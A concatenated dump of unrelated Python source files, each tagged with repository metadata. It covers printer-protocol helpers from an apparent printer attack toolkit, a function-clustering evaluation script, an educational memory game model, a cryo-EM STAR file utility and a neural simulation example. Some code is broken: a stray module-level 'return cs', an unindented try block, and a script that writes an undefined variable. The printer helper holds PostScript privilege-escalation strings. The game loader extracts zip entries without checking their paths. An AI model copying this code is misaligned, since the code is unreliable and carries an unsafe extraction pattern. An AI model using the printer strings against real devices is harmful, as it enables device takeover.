        │ normal commands (ascii) │ 0d? 0a │ 0d+ 0a 0c 04? │ 0d? 0a │ 0d? 0a 04? │
        ├─────────────────────────┼─────────┼───────────────┼────────┼────────────┤
        │ file transfers (binary) │ 0d? 0a │ 0c │ 0d? 0a │ - │
        └─────────────────────────┴─────────┴───────────────┴────────┴────────────┘
        '''
        # crop end-of-transmission chars
        if self.mode == 'ps':
            data = re.sub(r'^\x04', '', data)
            if not binary: data = re.sub(r'\x0d?\x0a\x04?$', '', data)
        else: # pjl and pcl mode
            if binary: data = re.sub(r'\x0c$', '', data)
            else: data = re.sub(r'\x0d+\x0a\x0c\x04?$', '', data)
        # crop whitespaces/newline as feedback
        if not binary: data = data.strip()
        return data
    # beautify debug output
    def beautify(self, data):
        # remove sent/recv uel sequences
        data = re.sub(r'' + const.UEL, '', data)
        #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        if self.mode == 'ps':
            # remove sent postscript header
            data = re.sub(r'' + re.escape(const.PS_HEADER), '', data)
            # remove sent postscript hack
            data = re.sub(r'' + re.escape(const.PS_IOHACK), '', data)
            # remove sent delimiter token
            data = re.sub(r'\(DELIMITER\d+\\n\) print flush\n', '', data)
            # remove recv delimiter token
            data = re.sub(r'DELIMITER\d+', '', data)
        #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        elif self.mode == 'pjl':
            # remove sent/recv delimiter token
            data = re.sub(r'@PJL ECHO\s+DELIMITER\d+', '', data)
        #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        elif self.mode == 'pcl':
            # remove sent delimiter token
            data = re.sub(r'\x1b\*s-\d+X', '', data)
            # remove recv delimiter token
            data = re.sub(r'PCL\x0d?\x0a?\x0c?ECHO -\d+', '', data)
            # replace sent escape sequences
            data = re.sub(r'(' + const.ESC + ')', '<Esc>', data)
            pass
        #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        # replace lineseps in between
        data = re.sub(r'\x0d?\x0a?\x0c', os.linesep, data)
        # remove eot/eof sequences
        data = data.strip(const.EOF)
        return data
# ----------------------------------------------------------------------
class const(): # define constants
    """Protocol constants shared by the PS/PJL/PCL connection helpers."""
    SEP = '/' # use posixoid path separator
    EOL = '\r\n' # line feed || carriage return
    ESC = '\x1b' # used to start escape sequences
    UEL = ESC + '%-12345X' # universal exit language
    EOF = EOL + '\x0c\x04' # potential end of file chars
    DELIMITER = "DELIMITER" # delimiter marking end of response
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # regex patterns: raw strings fix the invalid '\[' escapes that raise
    # SyntaxWarning on modern Python (the values are byte-identical).
    PS_CATCH = r'%%\[ (.*)\]%%'
    PS_ERROR = r'%%\[ Error: (.*)\]%%'
    PS_FLUSH = r'%%\[ Flushing: (.*)\]%%'
    PS_PROMPT = '>' # TBD: could be derived from PS command 'prompt'
    PS_HEADER = '@PJL ENTER LANGUAGE = POSTSCRIPT\n%!\n'
    PS_GLOBAL = 'true 0 startjob pop\n' # 'serverdict begin 0 exitserver'
    PS_SUPER = '\n1183615869 internaldict /superexec get exec'
    PS_NOHOOK = '/nohook true def\n'
    PS_IOHACK = '/print {(%stdout) (w) file dup 3 2 roll writestring flushfile} def\n'\
                '/== {128 string cvs print (\\n) print} def\n'
    PCL_HEADER = '@PJL ENTER LANGUAGE = PCL' + EOL + ESC
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    SUPERBLOCK = '31337' # define super macro id to contain pclfs table
    BLOCKRANGE = list(range(10000,20000)) # use those macros for file content
    FILE_EXISTS = -1 # file size to be returned if file/dir size unknown
    NONEXISTENT = -2 # file size to be returned if a file does not exist
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    PS_VOL = '' # no default volume in ps (read: any, write: first)
    PJL_VOL = '0:' + SEP # default pjl volume name || path seperator
| RUB-NDS/PRET | helper.py | Python | gpl-2.0 | 21,528 |
#!/usr/bin/python
# This research is supported by the European Union Seventh Framework Programme (FP7/2007-2013), project ASPIRE (Advanced Software Protection: Integration, Research, and Exploitation), under grant agreement no. 609734; on-line at https://aspire-fp7.eu/. */
# The development of portions of the code contained in this file was sponsored by Samsung Electronics UK. */
import math
import sys
est_file = sys.argv[1]  # path to the estimated instruction->id CSV mapping
ref_file = sys.argv[2]  # path to the reference (ground-truth) CSV mapping
# returns map[ins]->id
# returns map[ins]->id
def read_mapping(f):
    """Parse a 'hex_address,id' CSV file into {ins: id}.

    Lines whose id is -1 (unmapped instruction) are skipped.
    The file handle is closed deterministically (the original
    leaked it by iterating a bare open()).
    """
    m = {}
    with open(f) as handle:
        for line in handle:
            fields = line.split(',')
            ins = int(fields[0], base=16)
            ident = int(fields[1])  # renamed: 'id' shadows the builtin
            if ident != -1:
                m[ins] = ident
    return m
# Gets a map[group_id] -> set(ins)
# Gets a map[group_id] -> set(ins)
def make_grouping(m):
    """Invert an {ins: id} mapping into {id: set(ins)}.

    Uses dict.items() — works on both Python 2 and 3, unlike the
    Python-2-only iteritems() the original called.
    """
    cs = {}
    for ins, ident in m.items():
        cs.setdefault(ident, set()).add(ins)
    return cs
def make_grouping_ida(m):
    """Invert {ins: id} into {id: set(ins)}, dropping id 1 (IDA's
    catch-all/unknown function id).

    Uses dict.items() — works on both Python 2 and 3, unlike the
    Python-2-only iteritems() the original called.
    """
    cs = {}
    for ins, ident in m.items():
        if ident == 1:
            continue
        cs.setdefault(ident, set()).add(ins)
    return cs
return cs
# Given a cluster (estimated: set(ins)), get its classes (reference, set(ins))
# Given a cluster (estimated: set(ins)), get its classes (reference, set(ins))
def classes_for_cluster(cluster, ref_map):
    """Set of reference class ids covered by the cluster's instructions;
    instructions absent from ref_map are ignored."""
    return {ref_map[ins] for ins in cluster if ins in ref_map}
# cluster: set(ins), return: purity(float)
# cluster: set(ins), return: purity(float)
def purity_of_cluster(cluster, ref_map):
    """Purity of one cluster: the largest fraction of its instructions
    that share a single reference class.

    Single pass over the cluster (the original rescanned the whole
    cluster once per class — accidental O(n*k)).  Instructions missing
    from ref_map contribute to the denominator but to no class,
    matching the original behavior.  Empty clusters yield 0.0.
    """
    counts = {}
    for ins in cluster:
        if ins in ref_map:
            cls = ref_map[ins]
            counts[cls] = counts.get(cls, 0) + 1
    if not counts:
        return float(0)
    return max(counts.values()) / float(len(cluster))
def purity(clusters, ref_map):
    """Overall purity: per-cluster purity weighted by cluster size,
    normalized by the number of mapped instructions.

    (Removed the unused local 'maxes' the original declared.)
    """
    n = float(len(ref_map))
    p = float(0)
    for c in clusters:
        n_c = float(len(clusters[c]))
        p += purity_of_cluster(clusters[c], ref_map) * n_c / n
    return p
def entropy_of_cluster(cluster, ref_map):
    """Shannon entropy of the reference-class distribution inside one
    cluster (natural log), as a non-negative float.

    Single pass to count classes (the original rescanned the cluster
    once per class — accidental O(n*k)).  Instructions missing from
    ref_map enlarge the denominator but add no class mass, matching
    the original behavior.
    """
    counts = {}
    for ins in cluster:
        if ins in ref_map:
            cls = ref_map[ins]
            counts[cls] = counts.get(cls, 0) + 1
    n_c = len(cluster)
    e = float(0)
    for c_count in counts.values():
        frac = float(c_count) / n_c
        e = e + frac * math.log(frac)
    return - e
def entropy(clusters, ref_map):
    """Overall entropy: per-cluster entropy weighted by cluster size,
    normalized by the number of mapped instructions.

    (Removed the unused local 'maxes' the original declared.)
    """
    n = len(ref_map)
    e = float(0)
    for c in clusters:
        n_c = len(clusters[c])
        e += entropy_of_cluster(clusters[c], ref_map) * n_c / n
    return e
def FN(ida_clusters, ida_mapping, truth_clusters):
    """False negatives: counts instruction pairs that share a ground-truth
    function but not an estimated (e.g. IDA) function, each function's pair
    count normalized by its size.  Returns (fn, fn/tot) where tot is the
    equally-normalized count of all considered pairs.

    'seen' ensures each unordered pair is looked at once even when an
    instruction appears in several truth functions.
    """
    seen = set()
    fn = float(0)
    tot = float(0)
    for fun in truth_clusters:
        fun_insts = truth_clusters[fun]
        fn_fun = 0
        tot_fun = 0
        for inst in fun_insts:
            if inst in seen:
                continue
            seen.add(inst)
            # Estimated function containing inst (empty set if unmapped).
            if inst in ida_mapping:
                id = ida_mapping[inst]
                if id in ida_clusters:
                    ida_fun = ida_clusters[id]
                else:
                    ida_fun = set()
            else:
                ida_fun = set()
            # Pair inst with every not-yet-seen co-member of the truth fn.
            for inst_j in fun_insts:
                if inst_j in seen:
                    continue
                tot_fun += 1
                if inst_j not in ida_fun:
                    fn_fun += 1
        # Normalize per truth function by its instruction count.
        fn += float(fn_fun) / float(len(fun_insts))
        tot += float(tot_fun) / float(len(fun_insts))
    return (fn, float(fn)/float(tot))
def FP(ida_clusters, truth_clusters, truth_mapping):
    """False positives: counts instruction pairs that share an estimated
    (e.g. IDA) function but not a ground-truth function, each estimated
    function's pair count normalized by its size.  Returns (fp, fp/tot).

    Mirror image of FN() with the roles of the two clusterings swapped.
    """
    seen = set()
    fp = float(0)
    tot = float(0)
    #max_fp = 0
    #start_fp = 0
    for fun in ida_clusters:
        fun_insts = ida_clusters[fun]
        #start_fp = fp
        fp_fun = 0
        tot_fun = 0
        for inst in fun_insts:
            if inst in seen:
                continue
            seen.add(inst)
            # Ground-truth function containing inst (empty set if unmapped).
            if inst in truth_mapping:
                id = truth_mapping[inst]
                if id in truth_clusters:
                    truth_fun = truth_clusters[id]
                else:
                    truth_fun = set()
            else:
                truth_fun = set()
            for inst_j in fun_insts:
                if inst_j in seen:
                    continue
                tot_fun += 1
                if inst_j not in truth_fun:
                    fp_fun += 1
        # Normalize per estimated function by its instruction count.
        fp += float(fp_fun) / float(len(fun_insts))
        tot += float(tot_fun) / float(len(fun_insts))
        #if fp - start_fp > max_fp:
        #    print "New largest cluster @ %s, size %i" % (str(fun_insts), fp - max_fp)
        #    max_fp = fp - start_fp
    #print "tot = %i" % tot
    return (fp, float(fp)/float(tot))
def metrics(ref_map, est_map, metric):
    """Group est_map into clusters and print cluster count, instruction
    count and the value of *metric*(clusters, ref_map).

    Uses print() calls — valid on Python 2 and 3 for a single argument —
    instead of the Python-2-only print statements the original used.
    """
    clusters = make_grouping(est_map)
    print("Number of classes: %i" % len(clusters))
    print("Number of instructions: %i" % len(est_map))
    p = metric(clusters, ref_map)
    print("The evaluation of the mapping: %f" % p)
# Script driver: load both mappings, group them and report the FN metric.
#reference_mapping = read_mapping("E:\\tmp\\reference_mapping_%s" % f)
#estimated_mapping = read_mapping("E:\\tmp\\estimated_mapping_%s" % f)
reference_mapping = read_mapping(ref_file)
estimated_mapping = read_mapping(est_file)
reference_functions = make_grouping(reference_mapping)
estimated_functions = make_grouping_ida(estimated_mapping)
fn = FN(estimated_functions, estimated_mapping, reference_functions)
# print() call (valid on py2 and py3) replaces the py2-only print statement
print("FN,%i,%f" % (fn[0], fn[1]))
#fp = FP(estimated_functions, reference_functions, reference_mapping)
#print("FP,%i,%f" % (fp[0], fp[1]))
#print("FP,%i,%f,FN,%i,%f" % (fp[0], fp[1], fn[0], fn[1]))
#for m in [purity, entropy]:
    #print("BEGIN %s METRICS: " % str(m))
    #print("")
    #print("reference -> estimated")
    #metrics(reference_mapping, estimated_mapping, m)
    #print("")
    #print("estimated -> reference")
    #metrics(estimated_mapping, reference_mapping, m)
    #print("")
    #print("=========")
| diablo-rewriter/diablo | obfuscation/diversity_engine/iterative_diablo/function_classification_evaluation.py | Python | gpl-2.0 | 5,609 |
# Copyright (C) 2006, 2007, 2008 One Laptop per Child
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os
import shutil
from xml.etree.ElementTree import Element, SubElement, tostring, parse
from os import environ, makedirs, chmod
from os.path import join, basename, isdir, split, normpath, exists
import logging
import random
from gi.repository import GObject
import zipfile
import tempfile
from sugar3.activity.activity import get_activity_root
ART4APPS_IMAGE_PATH = ''
ART4APPS_AUDIO_PATH = ''
USE_ART4APPS = False
art4apps_data = None
try:
import art4apps
USE_ART4APPS = True
ART4APPS_IMAGE_PATH = art4apps.IMAGES_PATH
ART4APPS_AUDIO_PATH = art4apps.AUDIO_PATH
art4apps_data = art4apps.Art4Apps()
except ImportError:
pass
DEFAULT_FONT = 'Sans'
class Pair(GObject.GObject):
    """One memorize card pair: images, sounds, text and text-to-speech
    data for the two sides (a*/b*) plus a shared color group."""

    __gproperties__ = {
        'aimg': (str, None, None, None, GObject.PARAM_READWRITE),
        'asnd': (str, None, None, None, GObject.PARAM_READWRITE),
        'achar': (str, None, None, None, GObject.PARAM_READWRITE),
        'bimg': (str, None, None, None, GObject.PARAM_READWRITE),
        'bsnd': (str, None, None, None, GObject.PARAM_READWRITE),
        'bchar': (str, None, None, None, GObject.PARAM_READWRITE),
        'aspeak': (str, None, None, None, GObject.PARAM_READWRITE),
        'bspeak': (str, None, None, None, GObject.PARAM_READWRITE),
        'color': (GObject.TYPE_INT, 'Base', 'Base', 0, 10, 0,
                  GObject.PARAM_READWRITE)
    }

    def __init__(self):
        GObject.GObject.__init__(self)
        # Backing store for every declared property.
        self._properties = {'aimg': None, 'asnd': None, 'achar': None,
                            'bimg': None, 'bsnd': None, 'bchar': None,
                            'color': 100, 'aspeak': None, 'bspeak': None}

    def do_get_property(self, pspec):
        """Look up a property value from the backing store.

        Unknown names yield None, exactly as the original if/elif
        chain did by falling through without a return.
        """
        return self._properties.get(pspec.name)

    def set_property(self, name, value):
        """Store a value for a known property; unknown names are
        silently ignored (matching the original elif chain)."""
        if name in self._properties:
            self._properties[name] = value
class Model(object):
    '''The model of the activity.

    Reads and writes a game's configuration from/to xml and stores the
    pairs and grid information.
    '''

    def __init__(self, game_path=None):
        """Prepare an empty game model.

        game_path -- directory where the game is stored; defaults to
        the activity root.  When the directory does not exist the model
        is left half-initialised, mirroring the historical behaviour.
        """
        instance_root = join(environ['SUGAR_ACTIVITY_ROOT'], 'instance')
        self.temp_folder = tempfile.mkdtemp(dir=instance_root)
        chmod(self.temp_folder, 0o777)

        self.data = {}
        if game_path is None:
            game_path = get_activity_root()
        if not isdir(game_path):
            logging.error('Game_path not found in %s' % game_path)
            return
        self.game_path = game_path

        # Default game configuration.
        self.data.update({
            'face': '',
            'align': '1',
            'divided': '0',
            'equal_pairs': '0',
            'font_name1': DEFAULT_FONT,
            'font_name2': DEFAULT_FONT,
        })
        self.pairs = {}
        self.grid = []

        # True when the game differs from the saved copy and should be
        # saved and reloaded.
        self.modified = False
        logging.debug('Model init is_demo False')
        self.is_demo = False

        # Game-state bookkeeping used by the leader of a shared game.
        self.players = {}
        self.player_active = 0
        self.selected = 0
        self.turn = 0
        self.started = 0
        self.count = 0
def mark_modified(self):
logging.debug('Model mark_modified is_demo False')
self.is_demo = False
self.modified = True
self.data['mode'] = 'file'
    def read(self, game_file):
        """Load a game from *game_file* (a zip archive).

        The archive is extracted into the model's temp folder and the
        contained game.xml is parsed into self.data / self.pairs.
        Returns 0 on success, 1 when the xml root is missing and 2 on
        a parse error.
        """
        self.modified = False
        self.count = 0
        self.data['key'] = basename(game_file)
        self.data['game_file'] = game_file
        self.data['path'] = self.temp_folder
        self.data['pathimg'] = join(self.data['path'], 'images')
        self.data['pathsnd'] = join(self.data['path'], 'sounds')
        ''' extracts files in the zip file '''
        zipFile = zipfile.ZipFile(game_file, "r")
        for each in zipFile.namelist():
            if not each.endswith('/'):
                root, name = split(each)
                directory = normpath(join(self.data['path'], root))
                if not isdir(directory):
                    makedirs(directory)
                open(join(directory, name), 'wb').write(zipFile.read(each))
        self.pairs = {}
        ''' reads the configuration from an xml file '''
        try:
            xml_file = join(environ['SUGAR_ACTIVITY_ROOT'],
                            self.data['path'], 'game.xml')
            doc = parse(xml_file)
            if doc:
                memorize_elem = doc.getroot()
                attributes = memorize_elem.attrib
                # Copy each recognised attribute of the root element.
                if 'name' in attributes:
                    self.data['name'] = attributes['name']
                if 'scoresnd' in attributes:
                    self.data['scoresnd'] = attributes['scoresnd']
                if 'winsnd' in attributes:
                    self.data['winsnd'] = attributes['winsnd']
                if 'divided' in attributes:
                    self.data['divided'] = attributes['divided']
                if 'face' in attributes:
                    self.data['face'] = attributes['face']
                if 'face1' in attributes:
                    self.data['face1'] = attributes['face1']
                if 'face2' in attributes:
                    self.data['face2'] = attributes['face2']
                if 'align' in attributes:
                    self.data['align'] = attributes['align']
                if 'equal_pairs' in attributes:
                    self.data['equal_pairs'] = attributes['equal_pairs']
                if 'font_name1' in attributes:
                    self.data['font_name1'] = attributes['font_name1']
                if 'font_name2' in attributes:
                    self.data['font_name2'] = attributes['font_name2']
                if 'origin' in attributes:
                    self.data['origin'] = attributes['origin']
                    if self.data['origin'] == 'art4apps':
                        # Art4Apps games take media from the shared
                        # collection, not from the extracted archive.
                        self.data['pathimg'] = ART4APPS_IMAGE_PATH
                        if 'language' in attributes:
                            language = attributes['language']
                        else:
                            language = 'en'
                        self.data['pathsnd'] = join(ART4APPS_AUDIO_PATH,
                                                    language)
                idpair = 0
                for elem in list(memorize_elem):
                    attributes = elem.attrib
                    pair = Pair()
                    for attribute in list(attributes.keys()):
                        if(attribute == 'text'):
                            # 'text' is not a Pair property; skip it.
                            pass
                        else:
                            pair.set_property(attribute,
                                              attributes[attribute])
                    self.pairs[str(idpair)] = pair
                    idpair += 1
            else:
                logging.error('Read: Error in validation of the file')
                return 1
            return 0
        except Exception as e:
            logging.error('Read: Error parsing file ' + str(e))
            return 2
    def read_art4apps(self, category, language):
        """Create a game dynamically from the Art4Apps resources.

        category -- Art4Apps word category to build the pairs from.
        language -- language code for labels and audio.
        Returns 0 (kept for symmetry with read()).
        """
        self.modified = False
        self.count = 0
        self.data['game_file'] = '%s_%s' % (category, language)
        self.data['origin'] = 'art4apps'
        self.data['language'] = language
        self.data['path'] = self.temp_folder
        self.data['pathimg'] = ART4APPS_IMAGE_PATH
        self.data['pathsnd'] = join(ART4APPS_AUDIO_PATH, language)
        idpair = 0
        self.pairs = {}
        for word in art4apps_data.get_words_by_category(category):
            image_filename = art4apps_data.get_image_filename(word)
            # Only words with an existing image become pairs.
            if os.path.exists(image_filename):
                pair = Pair()
                label = word
                if language != 'en':
                    label = art4apps_data.get_translation(word, language)
                pair.set_property('achar', label)
                pair.set_property('bimg', basename(image_filename))
                snd_filename = art4apps_data.get_audio_filename(word,
                                                                language)
                if snd_filename is not None:
                    pair.set_property('asnd', basename(snd_filename))
                else:
                    # No recorded audio available: fall back to speech
                    # synthesis with a language-specific voice.
                    aspeak = language
                    if language == 'en':
                        aspeak = "en-us"
                    elif language == 'es':
                        aspeak = "es-la"
                    elif language in ['fr', 'ht']:
                        aspeak = "fr-fr"
                    pair.set_property('aspeak', aspeak)
                self.pairs[str(idpair)] = pair
                idpair += 1
        # Art4Apps games are always divided (text side vs image side).
        self.data['divided'] = '1'
        self.data['face1'] = '1'
        self.data['face2'] = '2'
        self.data['equal_pairs'] = '0'
        self.data['font_name1'] = 'Sans'
        self.data['font_name2'] = 'Sans'
        return 0
    def write(self):
        ''' writes the configuration to an xml file '''
        game_props = {}
        if(self.data.get('name', None) is not None):
            game_props["name"] = self.data['name']
        if(self.data.get('divided', None) is not None):
            # NOTE(review): 'divided' is initialised to '0' in __init__, so
            # this test is effectively always true and face1/face2 get set
            # even for undivided games.  'divided' itself is overwritten
            # with the real value further down.  Confirm intent before
            # changing.
            game_props['divided'] = '1'
            game_props['face1'] = '1'
            game_props['face2'] = '2'
        else:
            game_props['divided'] = '0'
        if 'origin' in self.data:
            game_props['origin'] = self.data['origin']
        if 'language' in self.data:
            game_props['language'] = self.data['language']
        if(self.data.get('equal_pairs', None) is not None):
            game_props['equal_pairs'] = self.data['equal_pairs']
        if(self.data.get('font_name1', None) is not None):
            game_props['font_name1'] = self.data['font_name1']
        if(self.data.get('font_name2', None) is not None):
            game_props['font_name2'] = self.data['font_name2']
        if(self.data.get('scoresnd', None) is not None):
            game_props["scoresnd"] = self.data['scoresnd']
        if(self.data.get('winsnd', None) is not None):
            game_props["winsnd"] = self.data['winsnd']
        if(self.data.get('divided', None) is not None):
            game_props["divided"] = self.data['divided']
        if(self.data.get('face', None) is not None):
            game_props["face"] = self.data['face']
        if(self.data.get('face1', None) is not None):
            game_props["face1"] = self.data['face1']
        if(self.data.get('face2', None) is not None):
            game_props["face2"] = self.data['face2']
        if(self.data.get('align', None) is not None):
            game_props["align"] = self.data['align']
        root = Element("memorize", game_props)
        # One <pair> element per pair; False is serialised as "".
        for key in self.pairs:
            pair_props = {}
            for e in ["aimg", "asnd", "achar", "bimg", "bsnd",
                      "bchar", "aspeak", "bspeak"]:
                if self.pairs[key].get_property(e) is not None:
                    if self.pairs[key].get_property(e) is False:
                        pair_props[e] = ""
                    else:
                        pair_props[e] = self.pairs[key].get_property(e)
            SubElement(root, 'pair', pair_props)
        with open(join(self.game_path, 'game.xml'), 'wb') as xml_file:
            xml_file.write(tostring(root))
    def def_grid(self, size):
        ''' create the grid for the play from the pairs information
        and shuffles the grid so they always appear in a different
        place
        '''
        # A size x size board holds size*size/2 pairs.
        psize = (size * size // 2)
        logging.debug('Size requested: %d', psize)
        self.grid = []
        temp1 = []
        temp2 = []
        i = 0
        # shuffle the pairs first to avoid only taking the first ones
        # when there are more pairs in the config file then the grid is using
        keys = list(self.pairs.keys())
        random.shuffle(keys)
        for key in keys:
            if i < psize:
                # Build the 'a' side tile for this pair.
                elem = {}
                elem['pairkey'] = str(key)
                elem['state'] = '0'
                elem['ab'] = 'a'
                if self.pairs[key].props.aimg is not None:
                    elem['img'] = self.pairs[key].props.aimg
                if self.pairs[key].props.asnd is not None:
                    elem['snd'] = self.pairs[key].props.asnd
                if self.pairs[key].props.achar is not None:
                    elem['char'] = self.pairs[key].props.achar
                if self.pairs[key].props.aspeak is not None:
                    elem['speak'] = self.pairs[key].props.aspeak
                temp1.append(elem)
                # Build the matching 'b' side tile.
                elem = {}
                elem['pairkey'] = str(key)
                elem['state'] = '0'
                elem['ab'] = 'b'
                if self.pairs[key].props.bimg is not None:
                    elem['img'] = self.pairs[key].props.bimg
                if self.pairs[key].props.bsnd is not None:
                    elem['snd'] = self.pairs[key].props.bsnd
                if self.pairs[key].props.bchar is not None:
                    elem['char'] = self.pairs[key].props.bchar
                if self.pairs[key].props.bspeak is not None:
                    elem['speak'] = self.pairs[key].props.bspeak
                temp2.append(elem)
                i += 1
            else:
                break
        numpairs = len(self.pairs)
        if numpairs < psize:
            logging.debug('Defgrid: Not enough pairs, requested=%s had=%s'
                          % (psize, numpairs))
        self.data['size'] = str(size)
        if self.data['divided'] == '1':
            # Divided game: keep 'a' tiles in the first half of the board
            # and 'b' tiles in the second half, each half shuffled.
            random.shuffle(temp1)
            random.shuffle(temp2)
            if size == 5:
                # Odd board: pad with an empty tile between the halves.
                temp1.append({})
            temp1.extend(temp2)
        else:
            # Mixed game: shuffle all tiles together.
            temp1.extend(temp2)
            random.shuffle(temp1)
            if size == 5:
                # Odd board: the centre cell (index 12) stays empty.
                temp1.insert(12, {})
        self.grid = temp1
        logging.debug('Defgrid: grid( size=%s ): %s'
                      % (self.data['size'], self.grid))
        logging.debug('Defgrid: data: %s', self.data)
def set_data_grid(self, data, grid):
self.data = data
self.grid = grid
    def create_temp_directories(self):
        """Ensure the temp images/sounds folders exist.

        For a modified Art4Apps game the referenced media files are
        first copied out of the shared collection into the temp
        folders, so the game becomes self-contained.
        """
        temp_img_folder = join(self.temp_folder, 'images')
        temp_snd_folder = join(self.temp_folder, 'sounds')
        if 'origin' in self.data and self.data['origin'] == 'art4apps':
            if not self.modified:
                # if it was not modified, don't change the temp directories
                return
            else:
                # we need to copy the files used in the game to the new path
                if not exists(temp_img_folder):
                    makedirs(temp_img_folder)
                if not exists(temp_snd_folder):
                    makedirs(temp_snd_folder)
                for key in list(self.pairs.keys()):
                    # all the images exist, but not all the sounds
                    for img in (self.pairs[key].props.aimg,
                                self.pairs[key].props.bimg):
                        if img is not None:
                            origin_path = join(ART4APPS_IMAGE_PATH, img)
                            destination_path = join(temp_img_folder, img)
                            if not os.path.exists(destination_path):
                                shutil.copyfile(origin_path, destination_path)
                                # NOTE(review): logged at error level but it
                                # is informational -- confirm before demoting.
                                logging.error('copy %s to %s', origin_path,
                                              destination_path)
                    for snd in (self.pairs[key].props.asnd,
                                self.pairs[key].props.bsnd):
                        if snd is not None:
                            origin_path = join(ART4APPS_AUDIO_PATH,
                                               self.data['language'], snd)
                            destination_path = join(temp_snd_folder, snd)
                            if os.path.exists(origin_path) and \
                                    not os.path.exists(destination_path):
                                shutil.copyfile(origin_path, destination_path)
                                logging.error('copy %s to %s', origin_path,
                                              destination_path)
                # Don't look for the images in the art4apps directory
                # after this
                self.data['origin'] = ''
                self.data['pathimg'] = temp_img_folder
                self.data['pathsnd'] = temp_snd_folder
        if not exists(temp_img_folder):
            makedirs(temp_img_folder)
        if not exists(temp_snd_folder):
            makedirs(temp_snd_folder)
| godiard/memorize-activity | model.py | Python | gpl-2.0 | 18,923 |
# Replaces the ctf values in input star file with the values in a reference star file
import argparse
import os
from star import *
def parse_args():
    """Define and evaluate the command-line interface for this script."""
    desc = ("Replaces the ctf values in input star file with the values "
            "in a reference star file.")
    parser = argparse.ArgumentParser(description=desc)
    # (flag, metavar, required, help) for each option; all take one value.
    options = (
        ('--input', 'f1', True,
         "particle file whose ctf values will be changed"),
        ('--reference', 'f2', True,
         "particle file whose ctf values will be used as a reference"),
        ('--output', 'o', False, "output file name"),
    )
    for flag, meta, required, helptext in options:
        parser.add_argument(flag, metavar=meta, type=str, nargs=1,
                            required=required, help=helptext)
    return parser.parse_args()
def main(reference_path,input_path):
    """Return the text of *input_path* with its CTF columns replaced by
    the values found in *reference_path* (matched by micrograph name).
    """
    # parameters that are relevant to the CTF estimation
    ctf_params = ['DefocusU','DefocusV','DefocusAngle','CtfFigureOfMerit','SphericalAberration','AmplitudeContrast']
    # dictionary of micrograph name to ctf values
    # key = micrograph name
    # value = ctf values in 4-ple: DefocusU, DefocusV, DefocusAngle, CtfFOM
    mic_to_ctf = {}
    output = ''
    print "Reading in reference CTF estimates"
    ref_star = starFromPath(reference_path)
    # Only replace the parameters the reference file actually contains.
    params_to_replace = [ params for params in ctf_params if params in ref_star.lookup ]
    for line in ref_star.body:
        mic_root = rootname(ref_star.getMic(line))
        if mic_root in mic_to_ctf:
            # First occurrence wins: one set of ctf values per micrograph.
            continue
        else:
            mic_to_ctf[mic_root] = ref_star.valuesOf(params_to_replace, line)
    print "Reading input file"
    input_star = starFromPath(input_path)
    output += input_star.textHeader()
    fields_to_replace = input_star.numsOf( params_to_replace )
    for line in input_star.body:
        values = line.split()
        mic_root = rootname(input_star.valueOf('MicrographName',line))
        for index,field in enumerate(fields_to_replace):
            # Keep the original value when the reference has none (falsy).
            values[field] = mic_to_ctf[mic_root][index] or values[field]
        output += makeTabbedLine(values)
    return output
if __name__ == '__main__':
args = parse_args()
input_path = args.input[0]
reference_path = args.reference[0]
if args.output:
output_path = args.output[0]
else:
root, ext = os.path.splitext(input_path)
output_path = root + '_replace_ctf' + ext
main(reference_path, input_path)
with open(output_path, 'w') as output_file:
output_file.write(output)
print "Done!"
| KryoEM/relion2 | python/star/replace_ctf.py | Python | gpl-2.0 | 2,295 |
from brian2 import *
import brian2genn
set_device('genn', directory='simple_example_synapses')
#set_device('cpp_standalone')
N = 100
tau = 10*ms
eqs = '''
dV/dt = -V/tau + Iin/tau : 1
Iin : 1
'''
G = NeuronGroup(N, eqs, threshold='V>1', reset='V=0', name='PN')
G.V = rand()
G2 = NeuronGroup(N, eqs, threshold='V>1', reset='V=0', name='LN')
G2.V = 2 * rand()
alpha = 20/ms
beta = 30/ms
S = Synapses(G, G2,
model='''
ds/dt= alpha*(1-s) - beta*s: 1
g: 1
''',
pre='Iin_post+= g',
name='ex_syns')
alpha2 = 40/ms
beta2 = 60/ms
p_post = 1
p_pre = 30
S2 = Synapses(G2, G,
model='''
ds/dt= alpha2*(1-s) - beta2*s: 1
g: 1
''',
pre='Iin_post+= g*p_pre',
post='''
g*= p_post-0.9;
''',
name='inh_syns')
S.connect(i=1, j=5)
S2.connect(i=[1, 2], j=[1, 2])
S.g = 'rand()'
run(100*ms)
| brian-team/brian2genn | examples/simple_example_synapses.py | Python | gpl-2.0 | 971 |
import gtk
import pango
import math
from core.world import TheWorld
class TextEditor(object):
    """A pango/cairo rendered text editor drawn as a thought bubble."""

    def __init__(self, text):
        self.__text = text
        # Character index of the cursor within the text.
        self.cursorindex = 0
        self.padding = 10.0
        self.width = 0.0
        self.height = 0.0
        self.pixel_width = 0.0
        self.pixel_height = 0.0
        # create text layout
        self.layout = pango.Layout(TheWorld.pango_context)
        fontDescription = pango.FontDescription("Monospace 8")
        self.layout.set_font_description(fontDescription)
        #layout.set_markup(self.text)
        self.layout.set_text(text)
        # calc text metrics
        self.recalc_text_size()
    # -- properties

    def __get_text(self):
        return self.__text

    def __set_text(self, text):
        # Keep the pango layout and cached sizes in sync with the text.
        self.__text = text
        self.layout.set_text(self.__text)
        self.recalc_text_size()  # recalc text size
    # Read/write 'text' attribute backed by the pair above.
    text = property(__get_text, __set_text)
    def recalc_text_size(self):
        """Refresh pixel and world-normalised sizes from the pango layout."""
        (self.pixel_width, self.pixel_height) = self.layout.get_pixel_size()  # bogus when called from init() !?
        self.width = self.pixel_width / float(TheWorld.width)  #+ self.padding * 2
